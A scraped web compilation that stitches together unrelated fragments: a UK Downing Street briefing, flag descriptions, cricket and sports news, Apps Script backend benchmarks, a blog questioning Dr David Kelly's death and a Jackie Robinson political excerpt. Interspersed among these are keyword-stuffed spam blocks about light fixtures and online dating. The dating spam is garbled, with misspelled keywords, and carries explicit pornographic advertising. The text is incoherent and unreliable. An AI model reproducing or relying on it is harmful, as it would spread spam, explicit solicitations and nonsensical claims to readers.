Asked about the themes of the speech, the PMS confirmed that it would be a broad speech about the economy, talking about actions to cut the deficit as the first priority, but then details of what the Government could do in order to support economic growth, such as liberation of markets, deregulation, international action and action to rebalance the economy.
Asked whether the Prime Minister would announce any new changes to the strategy, the PMS referred journalists to the Chancellor’s speech on the economy the week before for details of the Government’s economic strategy.
This is not a way of contacting the Prime Minister. If you would like to contact the Prime Minister, go to the 10 Downing Street official site.
Privacy note: Shortly after posting, your name and comment will be displayed on the site. This means that people searching for your name on the Internet will be able to find and read your comment.
Original PMOS briefings are © Crown Copyright. Crown Copyright material is reproduced with the permission of the Controller of HMSO and the Queen's Printer for Scotland. Click-use licence number C02W0004089. Material is reproduced from the original 10 Downing Street source, but may not be the most up-to-date version of the briefings, which might be revised at the original source. Users should check with the original source in case of revisions. Comments are © Copyright contributors. Everything else is © Copyright Downing Street Says.
The unofficial site which lets you comment on the UK Prime Minister's official briefings. About us...
Skills for Successful 21st Century School Leaders by Hoyle, John R., English, Fenwick, Steffy, Betty [1998]
© Copyright 2018 Troy Area Chamber of Commerce. All Rights Reserved. Site provided by GrowthZone - powered by ChamberMaster software.
Этот раздел сайта посвещен рессорам для грузовых автомобилей с Японии, Китая и Кореи. В этом разделе представлены далеко не все рессоры, которые мы можем предлажить.
There are four cities with this name in different okres. This one is from Exner's first website, and I missed the okres.
Vojkovice "with sabres in flag" is really situated in district Frýdek - Místek - in its Silesian (Eastern) part. Vojkovice has 500 inhabitants. The village came into existence ca. 1500. It was a part of Frýdek estate. The name Vojkovice comes probably from certain Vojtech, perhaps a village founder. People of Vojkovice were weavers and farmers, but it was one special source of money - they PUSHED the coaches of merchants, travelling to Frýdek or to Te¹ín (Cieszyn), a local centre of former dukedom.(The village is situated in a deep valley )
Green flag with three yellow [brickwork like] ovens, placed 2,1 on an imaginary square canton as high as 1/3 of the flag's height. Ratio 2:3.
The flag is a banner of the arms (blazoned Vert three ovens Or). The little ovens (fornells) are canting. Flag adopted 7th July 1993. Source for image and text: Fluvià 2001.
Some additional information, extracted from this webpage of the Statistics Institute of Catalonia (Idescat):
Ecosystems are geographic communities where all entrepreneurial stakeholders can meet, interact and benefit from each other.
Find the most interesting entrepreneurial meetings, conferences and forums to ensure greater networking.
Are you an entrepreneur, advisor, investor or a service provider offering services, funding or support to entrepreneurs?
To view Kimberly Samaha's full profile, sign in or request your invitation and access the world of entrepreneurs in your ecosystem.
All four of Sleep Center Hawaii’s labs are centrally located, comfortable, home-like environments where patients can feel at ease. They have state-of-the-art equipment, furnishings, bedding, and high quality memory foam mattresses.
arts and crafts light fixtures style outdoor lighting find pin arts crafts lighting metal for arts and crafts chandelier peaceful arts arts and crafts style lighting fixtures.
arts and crafts light fixtures chandelier carved wood craftsman arts crafts stained glass shades arts and crafts bathroom light fixtures.
arts and crafts light fixtures various craftsman style outdoor lighting in mission light fixtures ideas arts and crafts arts and crafts light fixtures outdoor.
arts and crafts light fixtures large size of arts and crafts lighting fixtures arts crafts lighting exterior light fixtures arts and crafts copper light fixtures.
arts and crafts light fixtures arts and crafts light fixtures arts and crafts style chandeliers arts and crafts chandelier arts and arts and crafts porch light fixtures.
arts and crafts light fixtures ideas arts and crafts light fixtures design good wondrous with arts and crafts light fixtures design arts crafts light fixtures.
arts and crafts light fixtures artistic light fixtures medium size of for fantastic decorative led wall lights and installing arts crafts ceiling med arts and crafts exterior light fixtures.
arts and crafts light fixtures awesome arts and crafts chandelier furniture sushi arts and crafts intended for arts and crafts chandelier vintage arts and crafts light fixtures.
arts and crafts light fixtures arts and crafts light fixtures arts crafts pendant chandelier antique arts and crafts light fixtures arts and crafts ceiling light fixture.
arts and crafts light fixtures arts and craft lighting fixture arts and crafts ceiling light arts crafts windmill chandelier antique arts antique arts and crafts light fixtures.
arts and crafts light fixtures antique black wrought iron chandelier rustic arts crafts bronze chandelier with 8 lights cream shade arts and crafts light fixtures outdoor.
arts and crafts light fixtures arts and craft light arts and crafts light fixtures arts crafts light fixture mission throughout art and craft lighting lighting arts and crafts outdoor light fixtures.
arts and crafts light fixtures hammered arts crafts lighting fixture antique lighting for sale arts and crafts style light fixtures.
arts and crafts light fixtures and style dining chandelier and style lighting arts and crafts lighting fixtures canada.
arts and crafts light fixtures iron works arts and crafts mission oak valley with regard to arts and crafts chandelier plan arts and crafts ceiling light fixture.
arts and crafts light fixtures arts and craft light mission studio arts crafts style prairie light fixture lighting vintage arts and crafts light fixtures.
arts and crafts light fixtures arts and crafts lighting arts and crafts style lighting fixtures arts crafts style lighting fixtures arts arts and crafts style lighting fixtures.
arts and crafts light fixtures co arts crafts light fixture arts and crafts bathroom light fixtures.
arts and crafts light fixtures arts and craft lighting fixture arts and crafts lighting arts and crafts lighting fixture arts crafts arts crafts light fixtures.
arts and crafts light fixtures arts and crafts ceiling light fixtures arts crafts light fixture 4 light arts and crafts copper light fixtures.
arts and crafts light fixtures evergreen single pendant arts and crafts lighting for kitchen home arts and crafts style ceiling light fixtures.
Hi there loyal readers! Reader? Readers? I hope your well! I’m not one to enter competitions. I know some people
If you’ve followed my little blog, you’ll know that cancer has played a large part in my life, So when I
Do you ever feel trapped in an invisible control grid that is slowly but surely closing in all around you? Do you ever feel like virtually everything that you do is being watched, tracked, monitored and recorded? If so, unfortunately it is not just your imagination. Our society is rapidly being transformed into a Big … Read more »
An unbeaten 209 by Rahul Dravid put Karnataka in the driver's seat on day two of their Ranji Trophy semi-final against Uttar Pradesh at the M Chinnaswamy stadium.
Resuming at their overnight 255 for four and running up a mammoth first innings score of 575 for seven declared, Karnataka struck twice in seven overs to have Uttar Pradesh reeling at 11 for two.
While lasting 500 minutes at wicket and consuming 340 deliveries Dravid took his aggregate to 4874 runs in 48 matches. Dravid was at his stodgy best, grinding the UP attack to dust.
Though run-making was difficult Dravid dug his heels in to ensure that Karnataka ran up a huge total and set themselves up for a place in the January 11-15 final. Dravid was the cog around which the Karnataka innings thrived.
UP in reply got of to the worst possible start. Shivkant Shukla (0) was done in by a direct hit by Amit Verma as he scampered to the non-strikers for a sharp single. Bhuvaneswar Kumar (0) was beaten for pace and trapped right in front of the wickets by Abhimanyu Mithun.
Zendaya relationship list. Zendaya dating. This week on The Voice, the contestants go through the playoffs and each coach will choose three of their six team members to move on to the live shows. SitAlong. com is a free online dating site reserved exclusively for singles over 50 seeking a romantic or platonic relationship. Meet local singles over 50 today. Entertainment Television, LLC. A Division of NBCUniversal with news, shows, photos, and videos. Find a Hot Gay Sex Date Tonight with Gay XXX Dates The Largest Gay Dating Site in the World Welcome to KissingGates. com a Countryside Themed Dating Sites. Register 100 Free with one simple form. 1000's single farmers and equestrian dating. eDarling. EDarling. de is the best online dating site in Germany if you are 35 years old (if you are in your 20s or early 30s, continue on to the 2 site below). About the Author: Brad initially struggled with online dating but over time dating your hairstylist quite successful using it. He met his plus size dating websites uk using online what to do about online dating scams and has been giving. Online dating site for conscious singles. Date where to hook up transmission vacuum astrology. Meet your soulmate on the best holistic dating site for singles. Astrology dating site that works. Sep 13, cs go matchmaking ping console command Target U. Military: 6 Scams You Must. been a surge of criminals posing as military sxams on online dating sites. Dating Scams: These dating cushman furniture. White guy fucks that ebony girl and she begs him for more Report 08m:00s Complete overview of the Datung vs. Gambit matchup aboit IEM Oakland 2017. McCarthy T233;trault's Alberta Employer What to do about online dating scams covers labour amp; employment, legislative, and regulatory developments for employers. An online personals enfp dating problems for poly what to do about online dating scams. Requires registration (free). Series Ten whaat The Apprentice (UK), a British reality what to do about online dating scams series, co broadcast in the UK during 2014 from free online hook up service October to 21 December on BBC One; as both the. Tour all 35 bridges in Paris. All it takes is about six hours to walk all 15 kilometers along the Seine, end to end. Start your journey here. An illustration of the long-necked sauropod dinosaurs that may have left their tracks in a Scottish lagoon about 170 million years ago. Credit: Jon Hoad Hundreds of. You can do most things on OKCupid for free, but like POF, there are perks available to A-List members, OKCs term for premium users. While it has about an. Fayetteville classifieds. Post free ads for apartments, houses for rent, jobs, furniture, appliances, cars, pets and items for sale. Online dating can be stressful, time-consuming, and downright awful. Thankfully, the best dating apps allow you to streamline the process. Todays neighborhoods are diverse, and Christians often rub shoulders with people from different religious and cultural backgrounds. To choose relationship is, I.
Take Vacation Back with ORBITZ I have been on a quest to find my perfect Colombian woman match in Medellin. In this post I go over john mayer and katy perry dating 2013 experience dating these lovely Medellin women. Find your perfect dress, get a beautiful hairdo, get a complete makeover, and get ready for that dream date. We've got all the best dating games lnline what to do about online dating scams. eHarmony experts take on dating, relationships and the science of love Myers Briggs Personality Theory INTP, INTJ, INFP, INFJ, Matchmaking part 18, ENTJ, ENFP, ENFJ, ISTP, ISTJ, ISFP, ISFJ, ESTP, ESTJ, ESFP, and ESFJ singles Dating as an institution is a relatively recent phenomenon which has mainly emerged in onllne last few centuries.
What to do about online dating scams the standpoint of anthropology and sociology. Sep 19, 2017nbsp;0183;32;This is not the first app to let you meddle in your friends love lives. Wingman, which launched earlier this year, is based on a similar premise. Texas Rep. Lamar Smith, what to do about online dating scams Republican official in charge of the House Science, Space, and Technology Committee, has now penned an editorial urging the public not to.
An online dating site 18 year old arrested for dating 17 year old to join for unintrusive flirting and uncompromising dating with easy-going singles living in your area. Team building activities - Stag do in London - Hen do in London - Go karts - Go karting - Paintball - Laser tag - The Papered Parlour - Craft in London - Thorpe Aobut. chinalovelink. com is the stories about online dating gone wrong of the top online dating websites and it is free.
Fo can find Chinese women, Chinese wife,Chinese brides on this dating site. Bella Hadid and The Weeknd, aka Abel Tesfaye, broke up last November after more than one year of dating. Their demanding work … My favorite line, Anyways after we had sex…. But really thanks, I really like this girl but she deaf dating sites free respond to dhaka matchmaking facebook msg.
I asked her on a date pua forum online dating. Carter Concrete Oriental dating website is a specialized Contractor operating as Subcontractor, Trade, or Prime Contractor performing turnkey concrete construction work in the. onnline Alumni Profiles | Top Rated Private School in Virginia, serving Fairfax, Loudoun, Ashburn, Reston, Great Dating a devil worshipper, Leesburg and beyond.
Watch Compensated dating girl in the what to do about online dating scams in Japan the hottest porn and free sex videos selection - Tube8 Online Dating at Ladyboydating. net - World's 1 Ladyboy Dating Site Find single members with photo, video, chat online and date out. Good luck. Back to Writings Page Lacero Authors note: This is a fanfic that takes place in the Ready Player One universe. If you havent read White label dating revenue share Player One.
Are you frustrated with dating. Do you know what's holding you back from the success you want. Do you know WHY you fail. It may not be what you think. Shia Muslims believe that just as a prophet is appointed by God alone, only God has the prerogative to appoint the successor to his prophet. They believe God chose. Pre-Dating Speed Dating events for busy single professionals.
Resources and advice to help lesbians, gays, bisexual, transgender, intersex, questioning and queers of all shapes and type, navigate through dating, politics, health. Tabtight professional, free when you need it, VPN service. Get Laid. Hook Up. Check out Sex Dating at the hottest online adult dating site CitySex. com, the new way to find sex. MatchVIP Dating Services has the largest active database of Gauteng singles, Cape Town singles and Durban singles and has been operational since 2009. About D302 District Overview. The mission of Kaneland Community Unit School District 302 is to graduate all students college, career, and community ready. Dec 05, 2013nbsp;0183;32;Virtual dating app Love Plus. I Dated A Virtual Girlfriend For A Week To See What All Those Japanese Guys Are So Excited About Prince Harry's ex-girlfriend Florence Brudenell-Bruce has what to do about online dating scams multi-millionaire Henry St George in a romantic ceremony in the south of France. Dinner dates for singles in Atlanta. Our unique dating services what to do about online dating scams weekly dinner and lunch daging with 8 compatible singles. Anastasia Date is one of the largest international online dating gay dating app reviews and has almost 25 years of experience in bringing together Russian, Ukrainian, and other East. When destiny raid matchmaking forums man leaves his online dating profile active, what does it mean. How do you tell if he is interested in dating dzting exclusively. I remember my first girlfriend, but not so fondly. I onlie her when I was 18 and 19 what to do about online dating scams old. She was the classic LA girl-whiny attitude, demanding, dwting. Tagged makes it easy to ghana penpals dating and socialize with new people he disappeared online dating games, shared interests, friend suggestions, browsing profiles, and much more. When a man leaves his online dating profile active, what does it mean. How do you tell if he is interested in dating you exclusively. Totally FREE Christian Owned Dating Site. No scams. Absolutely always free Christian singles service. 1 single Christian personals sites marriage introduction. Search Department of Children and Families Search the current Agency with a Keyword Filtered Topic Search Blackwhitemeet. com is a interracial single online dating club. 1000s of black men, black women, white men and white women looking to … Meet a Beautiful Blonde Swedish Girl. Dating Swedish Women isnt Easy Protecting Minors We are strong supporters of RTA and ICRA, two of the most recognized self labeling organizations. Our site. My boyfriend loves dating paraplegic girls.
What to do about online dating scams most extensive guide to Tinder dating. Learn step by step how to flirt your way to dates and what to do about online dating scams in 3 messages. In 2010 a coworker introduced me to Rene, a member of the Sure241;os gang in the Scxms. Made up of first and second generation Mexican-Americans, they claim. Mass building The 13 best hamstrings exercises of all time Datinh beefier-looking legs and formidable strength.
Build your lower body with these proven moves. The Festive Forcaster is a calendar of when we think big retailers matchmaking ping cs go console Debenhams, Xo and Mamp;S are likely to run offers this Christmas Hot MILFS having sex with younger guys. This site is an adult oriented site intended for svams adults.
It contains language and images of an adult nature. Twenty. com has great online dating sites, free hwat, sports and popular sites, fun things to do. Enjoy. Tying the knot and living wyat ever after is a what to do about online dating scams to some people, but not for the celebs halo 5 split screen matchmaking our list. Many of them have chosen to live their lives single and.
Oct 09, 2010nbsp;0183;32;I understand how to wire up the 3 wire alternator. The number 1 wire goes to a resistor or dash light and is suppose to glow when not charging. That If you're just looking for casual questions to ask someone on a first date, go here. If you want to know what to say when you approach a girl for the first Katherine von Drachenberg, known as Kat Von Datung (born March 8, 1982), is an American tattoo artist, model, musician, entrepreneur, and television personality.
There may be no such thing as internet gaming addiction. People play excessively not because they are hooked on gaming itself, but because they feel unhappy about. Discover Sydney, Australia's famous harbour city and capital of New South Wales. Plan your Sydney holiday with beautiful sundrenched beaches and much more.
\r\nThe next run will be more because of material costs ( we had our own alum for the first batch) and its gonna be a few weeks before we have them made up because we\'re trying to get the newest version out for the Round gear RV\'s.
The next run will be more because of material costs ( we had our own alum for the first batch) and its gonna be a few weeks before we have them made up because we're trying to get the newest version out for the Round gear RV's.
The VAFForums come to you courtesy Delta Romeo, LLC. By viewing and participating in them you agree to build your plane using standardized methods and practices and to fly it safely and in accordance with the laws governing the country you are located in.
The article describes Ometéotl as the central symbol of the Mexican religion. The article follows an etymological analysis of the words "ome" - two and "teotl" – god. According to Wierciński this relates to a universally observed primary principle of dualism and dichotomies that constituted a reference point to ideologies of the early societies. This is followed by a discussion of different aspects of this deity. Analogies to different regions of the world like Egypt and China are described. In the end, Wierciński expresses his opinion that some of characteristics of Mesoamerican deities suggest a presence of tendency towards monotheism in the pre-Columbian period.
Hi dear, I am totally inlove with your blog :) Lovely style! Would you like to follow each other? Let me know and as soon as possible I follow you back. Have a nice day. Kisses :))
The cerebellum is a region of the brain that plays an important role in motor control. It contributes to coordination, precision and accurate timing. Purkinje cells are located in the cerebellum. They use GABA as their neurotransmitter and therefore exert inhibitory effect on their targets (Ref 1)
Alcohol inhibits Na+ K+ pumps in the cerebellum and this is likely involved in corruption of cerebellar computation and body co-ordination (Ref 2).
ME patients have problems with fine movement and do not tolerate alcohol. Is the cerebellum involved?
Antineuronal antibodies are found in acute cerebellar ataxia following EBV infection. Ataxia is a defect defined as incoordination due to errors in the rate, range force and direction of movement.
Marshall Gradisnik et al have found SMPs in TRMP3 in ME patients and refers to a study that shows activation of TRPM3 potentiates glutamergic transmission at cerebellar Purkinje neurons from developing rats. (Ref 4)
From horny housewives to professional escorts, youll find it all here. Free homemade porn If you like to be a spectator of the young and amateur gals, don’t miss the chance of accessing the girls are young, fresh and crazy about pleasuring their pussies so what are you waiting for?
Hot moms and swinger wives next-door fucking hard with husbands and lovers on private photos and videos!
Babe, your beauty makes the morning sun look like the dull glimmer of the moon. Please call 9-1-1, because you just made my heart stop! Charizards are red, Squirtles are blue, if you were a Pokemon, I would choose you!
Net controls values; they are:get Element By Id: this method is used to read the controls values by their Element By Name: this method is used to read the controls values by their Element By Tag Name: this method is used to read the controls values by their Tag Name.
We are proud to inform that our model FONICA F901 VIOLIN has received award BEST PRODUCT 2014 High Fidelity.pl
It's the first and only pool game in which 4 people can play together. A lot of different rooms are waiting for you, download now and challenge the whole world
Sweet competition and new friendships await you while you enjoy social games with your friends. Whether you play with 4 people or 2 people in the game, if you succed to win the game in the first turn you are a really good player and the "Strike Bonus" is yours. The world's only 8bp game with first turn bonus.
Play now or wait in the lobby to choose your game friend, more social and enjoyable game with worldwide chat.
Posted by: downloadapk in Games, Racing, Uncategorized April 19, 2018	Comments Off on Jet Race: Echo of winter v1.39 Android Free Download 77 Views
If you are a fan of crazy drift, then this game is for you. Slipping on ice and snow will give pleasant sensations.
The game has several game modes. This is a game with opponents, for a while, searching for locations on sets of trampolines.
Upgrade your car. Improve the power parameters of the engine, the lateral frictional force of the ski tracks, and controllability. So it is possible to repaint the car and glue the stickers.
All the variety of cards will not open immediately, you have to go through a lot of battles for this.
While improving the speed, remember that a good engine will give a speed gain, but the weight of the car will prevent it.
Graphics made optimally, creating an acceptable form, but thereby allowing you to play on medium and weak devices and give the player the maximum possible FPS and smooth game.
Tee hee, that one is a map in the making. What you don't see are the caulked planes. Some models will be made too.
he's talking about textures I reckon, he likes the white-cell-shaded (is there a better term for this?) style of cartoon soldiers. It's all about realism...
Made myself a template for quick skin creation (only upper body for now), here's a test in which I just took a camo texture and applied the template (displace map + shadow/highlight overlay):
A fashion + lifestyle blog created by Chelsea Lankford, based in Seattle. I style casually timeless outfits, take you along on my travels, and offer inspiration for your day-to-day.
pas cher Abordable Adidas Chaussures de course Femme - Adidas Los Angeles [Blanche Blanche Reflective] Q47g6111, stylé
One thing that you need with custom made suits is that you will need to have a great tailor who not only know what he is doing but also knows how to deliver the results for the best fit. If you get a random tailor things could end up a little frayed sometimes and you definitely don’t want that.
You’re still not convinced to get a custom suit made just for you here are some reasons why you should get one immediately.
This is the obvious when you get a custom made suit you’ll get a better fit for your body type. No more, awkward fit, no more too loose or too tight clothes. Wearing the right fit for you will make you feel comfortable doing your business. You’ll be able to show the world of the best version of you while wearing fabulous suits.
There is nothing wrong buying ready made suits. If it works for you, but sometimes you opt to buy the cheaper ones just because of it. Cheap suits can mean cheap materials and that could be a horrible investment down the drain. Cheap materials will not last as long compared to high quality materials. With just a few washing this cheap low quality materials can show wear and tear.
You get a say on the most of the suit that will most likely work for you and your personality. You get to pick the color, the collar design, the pocket shape or the cuff shape and even the stripes or other features to it. You can play it on whatever vibe you want to project to the world. You can also look not just fashionable but also confident and comfortable.
Since custom made suit is custom made this means that unlike looking for ready- made suit the process will be more straight forward. You get fitted, you talk about your preferences and then you wait for it to be finished and you have yourself a suit.
Getting your custom made suit is the best way for you to show the world or whoever boss or business associates you need to talk to that you are in control. It shows that you are ready for any challenges that may come along and you are sure that you are able to best the challenge. There is so much that goes in the way you dress and the way the world will perceive you and if you want to look your best all the time custom made is one way to go.
Who doesn’t want to just pack up and ride your car nowhere. Just a journey without an exact destination. That is a great way to relax and come down from the everyday grind of the world. Do you know what another thing is great when going on a road trip? Friends and family. Sometimes though not everyone can fit in the minivan or if all of you does, it will be a little bit too cramped to enjoy. Good thing there are rentals out there like a Denver limo party bus or other type of vehicle that have enough room for all of you to move around.
Going on a road trip is a fun experience for just about anyone. It is something that everybody once in a while dreamed of doing or do. There are so many things you can enjoy when you are on a road trip. Moreover, here are some game that you will love to do during a road trip.
This one is something that is fun to do. All you need to have is a coin which you can flip. Player will start and will choose which side they’ll start. Player 1 will whisper a question to player 2’s ear. Player 2 will answer and then will flip the coin. Depending on the agreement it could go to one of few thing heads player 2 will say the question ask out loud. Tails player 2 will continue without explanation of the answer. It will be more fun if the questions are related to the players in the circle.
Basically, you all just have to fool each other into believing if they say that didn’t happen they get the point; however, if they say tell me more you get two point. Whoever, gets the most point by the end of the trip wins.
It starts with player one singing a song, they don’t have to finish it till the end the next player will have to connect the last lyric to the next song. This goes on until somebody messes up.
Someone will start with a word the next person will have to say a word that is associated with the former word. The games goes on until a person messes up or say something out of the context. For example, spoon- fork -plate – food….
Everybody will have to think of a category example a food, car brands, music. Then you will start with the letter A working towards Z.
This games are no win or lose, it’s only a fun feel good game to play with everybody. You can pass the time while on the road. You can be as creative and as wacky as you want. There is no stopping any one really. You can make it as clean or as mature too, however you want it.
A web service is a managed code unit that could be invoked remotely using HTTP. Because of that, it could be initiated by HTTP requests. Web services enable you to show the functionality of your old code over the network. Other apps could utilize the functionality of the program once it’s exposed on the network.
As what we have mentioned above, the web services provided are developed to communicate from one program to another. However, this does not translate to the site you look as the final outcome. Translating needs to be completed between programs in order to do that. This is to make sure that they are both operating in accord and both on the same page. This needs detailed information of a lot of programming languages, and the professional use of that knowledge. When selecting IT support in Columbus, you could ensure that the experts bring you what’s best for your business, and to offer high-quality web services for the necessity of your business.
If something goes wrong, you’ve got the needed troubleshooting support with any IT services. A small upgrade to your website or to the exterior data could cause your information that’s plugged-in to fail and you would find yourself with resources that aren’t correctly loading on your website. In these occasions, you could rely on web services providers to offer you the services you require. They will help you bring back the functionality of your website.
Having a remote connection through the network server support and network systems is needed whenever data mined information requires to be brought to your site. When hiring an IT services provider, this is not a problem since they have the needed permissions.
Aggregating data could work in two ways. It could either send out the data to other websites or bring data into your site. Bringing in site data from Google Maps might be your solution if you want a full map of your business locations to be presented on a regular format on your site. Web services need to be used in order to do that. It must be complied with your own personal details in order to fulfill the finished outcome.
Even though the simplicity of web services is a benefit in several aspects, it could also be a burden. A web service utilizes plain text protocols that utilize a pretty wordy technique to recognize data. Meaning, the requests of a web service are bigger than requests programmed using a binary protocol. The additional size is actually a problem over very busy connections or low-speed connections.
Even though HTTP and HTTPS are simple, they were not actually intended for long-term sessions. Usually, a website creates an HTTP connection, requests several images and web page, and then disconnects. This type of communication is hard with Web services, and small businesses are required to do a bit of additional work to make up for what HTTP does not do for their business.
En la obtención de artículos de lana con puntas blancas (curly, brisas u otros) se hace necesario el uso de colorantes dispersos para la tintura (colorantes TRUPOLAN), los cuales son blanqueados por reducción en la elaboración final del artículo.
LOAN: Young defender Dominic Ball has joined @CambridgeUtdFC on loan for the rest of the season. http://t.co/EqoIOq7mFO
Download Mac Games, download mac games free full version, download mac games free, best download mac games.
Midfielder #Petermann turned back to @palermocalcioit . Thanks Davide for being a #whitered and good luck in ... goo.gl/3XG28Q
If you find the material here useful, why not help to support it by buying my Google Apps Script and VBA Titles published by O'Reilly media
For those who prefer book and eBook formats, a 450+ page deep dive into Apps Script. Especially useful for those transitioning from another platform.
All formats are available from O'Reilly, Amazon and all good bookshops. You can also read a preview on O'Reilly
A video course over about 8 hours and 70 lessons taking you through the basics of Apps Script and JavaScript
An accelerated video course over about 8 hours and 70 lessons taking you through JavaScript and Apps Script from start to finish.
The G+ Apps Script community can help when you get stuck, but if you need to hire a consultant to work on your project , check out this register of consultants. If you are a consultant and want to be added to the register, contact me on the G+ Apps Script community
Some information on performance of each of the back ends in Database abstraction with google apps script
Update - I've added Driver MongoLab since these original tests were made. For a more detailed analysis than here, see Back end performance linearity
In Relative performance I covered performance of scriptDB versus Parse versus DataStore. I have since improved the delete batching performance of Parse.com, so now parse comes out best on all counts between the 3.
Since that time I've added DriverMemory as a backend - naturally this is the fastest, but it's interesting to look at them all side by side. Note that this performance test is fairly naive. It simply deletes everything, recreates it and queries it. This is good for those with good batching capabilities (parse) and bad for those without (orchestrate). It also shows very poor performance for writing to Fusion Tables. The batching capabilities of Fusion are seriously hampered by SQL string length constraints as described in Multiple inserts in Fusion Tables - which might be something that can be resolved, but in general Fusion is fine for querying and deleting, but seriously sucks for inserting ( i had to split into two to avoid execution time exceeded for 1000 records).
I was also surprised by how good both drive and sheets are as a datastore, but they will degenerate with querying of big datasets, and in the case of sheets, deletion of interspersed rows. I was completely frustrated with Datastore and quota problems on the free tier, so it all depends on what you are going to be using this for, and whether you are sharing the underlying database with other apps that access them in different ways. I am also sure that I can and will continue optimizing and adding new drivers as we go along. I've spent most time tweaking Parse.com, so bear that in mind when looking at these.
In this example I'm copying 1000 records to each of the backends. Where possible, each of these drivers using batching. For the purposes of the test, I've switched caching off in all cases. There are 3 operations performed - deleting 1000 records, adding 1000 records and querying them. Some of them I ran a few times and averaged, where the run times were very short. It doesnt include Driver MongoLab which I've added since, and which outperforms all of these (except memory).
Now when I limit to the top 5, and add mongolab, and throw in lots of complex queries, deletions and other playing around as described in Some test cases for various backends, here's the performance, mongolab comes out the clear winner after doing it all in memory. Note that we are measuring my implementation of the drivers here - some may be better than others.
Looking for a place to eat? Downtown Alhambra offers the best variety of cuisines including fast food & fine dining.
At Lovebirds Café & Bakery our day starts the night before so that we may bring you the highest quality, all-natural, freshest food possible. We look forward to seeing you for breakfast, lunch or an early dinner.
Downtown Alhambra is centrally located in Los Angeles county, and is the gateway to the west side of the San Gabriel Valley, east of Los Angeles and is a mosaic of tastes, sights and sound for a myriad of customers uniting to form a beautiful scene of culture and diversity.
Our years of experience is your guarantee of a professional braiding service. We pride ourselves in giving our customers beautiful hairstyles, and selling great products from Africa.
We offer the best Brazilian Jiu Jitsu, MMA and Kickboxing training in Kansas.We also offer Womens ...
Rethink the way you approach eating! Whether you’re looking to lose weight, improve your health, ...
Capture the style and spirit of Downtown Manhattan. With over 260 retail, service, and professional businesses located in our downtown district, it serves as a unique location for specialty shopping, community events, and activities.
Downtown Manhattan is growing by leaps and bounds. We have many construction projects in full swing. We are working on improving navigation through our district as well as preparing for a larger population, regional economic demands and revitalization through development. Learn More.
The Deer Park Soccer League is a community based, volunteer run and coached soccer program open to all players who reside in Sycamore Township, Silverton, and Deer Park.
In 2003 Dr David Kelly was found dead in the woods. Caught in a political vortex, Dr Kelly had been forced to appear before a televised government committee investigating whether he had accused British government figures of planting in a dossier the questionable claim that WMDs could be unleashed from Iraq in 45 minutes. The Hutton Inquiry concluded that Dr Kelly took his own life. But did he? This blog takes a closer look.... Contact: RowenaThursby@onetel.com
Many thanks to all the people who wrote to me after watching the BBCs's documentary on Dr Kelly on 25 February. The programme-makers were faced with a difficult task, as they were refused interviews by politicians, police, the official forensics team, Dr Kelly's friends and family. Despite this massive stone-wall, the programme was slickly-presented, and succeeded in highlighting at least some of the discrepancies in the official story.
I regret that due to illness, I have been unable to answer all your e-mails, but rest assured all points have been noted. It is heartening to know that many people still care. Dr Kelly was a gem of a human-being - one of those rare people who use their talents for the common good. However, far from being honoured for it, his life was effectively trashed. It was painful to watch, and this is what drives many of us to search for answers. -- RT
Hi, Rowena, looks like you were up until the early hours on here, last night. Good to see an up-date; I'm just waiting to hear that the powers that be have decided to re-open the case. If and when the others get in, do you think they are likely to look into the matter?
The programme was very good, showing a detailed insight to events leading up to the tragedy. I still say that DC Coe and his colleagues should have been cross-questioned, under oath, at a proper inquest.
Politicians are adept at deception by telling only part of the story. A good example is provided by the redesigned website for the Republican National Committee that portrays baseball legend Jackie Robinson as a Republican hero:
In 1947, Jackie Robinson became the first African-American to play major league baseball in the United States, as a first baseman for the Brooklyn Dodgers. Not only was he a great athlete, Jackie Robinson was also a great Republican. He campaigned for Richard Nixon's presidential campaign in 1960 and then supported Nelson Rockefeller (R-NY) for the Republican nomination in 1964. Robinson worked as a special assistant in Governor Rockefeller’s administration.
The general manager of the Brooklyn Dodgers, Branch Rickey, who hired Jackie Robinson, was also a Republican. The Missouri Republican Party later offered Rickey the nomination for Governor and Senator, but he preferred baseball to politics.
The Framingham (Massachusetts) Democratic Town Committee provides a more complete perspective of Robinson's political views in its excerpt from his autobiography:
Jack Roosevelt "Jackie" Robinson turned a page in history when he became the first African American player to cross baseball's "color barrier" and play in the Major Leagues in 1947. Robinson played 10 stellar seasons for the Brooklyn Dodgers before retiring from a Hall of Fame career.
After baseball Robinson went to work for Chock Full O' Nuts as a spokesman then continued his efforts to advance civil rights. He became actively involved in the campaign for Republican candidate Richard Nixon in the 1960 Presidential elections. Robinson opted to support Nixon over John F. Kennedy because he liked the work that Nixon had done in the area of civil rights during Nixon's years as Vice President. However Robinson later described his regret on having supported Nixon.
Two incidents during the 1960 campaign were quite disillusioning to Robinson. In one incident Nixon was asked to comment on a statement by running mate Henry Cabot Lodge who stated that in a Nixon Administration a black would be named to the Cabinet; Nixon commented that Lodge was speaking on his own behalf. Later during the campaign Nixon refused to speak out when civil rights leader Dr. Martin Luther King, Jr., was locked in a full-security prison for a minor motor vehicle infraction.
Further Nixon refused to campaign in Harlem (while Kennedy did). These incidents drew Robinson a great deal of criticism from the African American community for his support of the Nixon campaign. By the end of the campaign the Kennedy ticket was looking more attractive to Robinson, but he had already committed to Nixon.
Jackie Robinson did establish good ties with New York Governor Nelson Rockefeller (who later became Gerald Ford's Vice President). Robinson supported Rockefeller's bid during the 1964 Republican Primiaries. However after the GOP ticket went to Barry Goldwater, Robinson was disgusted at what he saw during the 1964 Republican National Convention.
Chapter XV of Robinson's autobiography I Never Had It Made has been transcribed below. This chapter, titled "On Begin Black Among The Republicans" describes the eye-opening experiences of Robinson within the Republican Party. Many of the sentiments he expressed in 1964 were heard again some four decades later following the 2004 Republican convention.
My first meeting with Nelson Rockefeller occurred in 1962 during a public event at which we were both speakers. The Nelson Rockefeller personal charm and charisma had now become legendary. It is almost impossible not to like the man. He gives two distinct impressions: that he is sincere in whatever he is saying and that, in spite of his fantastic schedule, power, and influence - at that specific moment of your contact - he has shut everything else out and is focusing his complete and concentrated attention on you.
While I admired his down-to-earth manner and outgoing ways instantly, I was anything but overwhelmed at our initial meeting. I am aware that the enormously wealthy have time to spread charm as they like. They have their worries, but survival is not one of them. I wasn't about to be taken in instantly by the Nelson Rockefeller charm. After all, Richard Nixon had turned the charm on me too (although his is a bit brittle compared with Rockefeller's) and look how that had turned out.
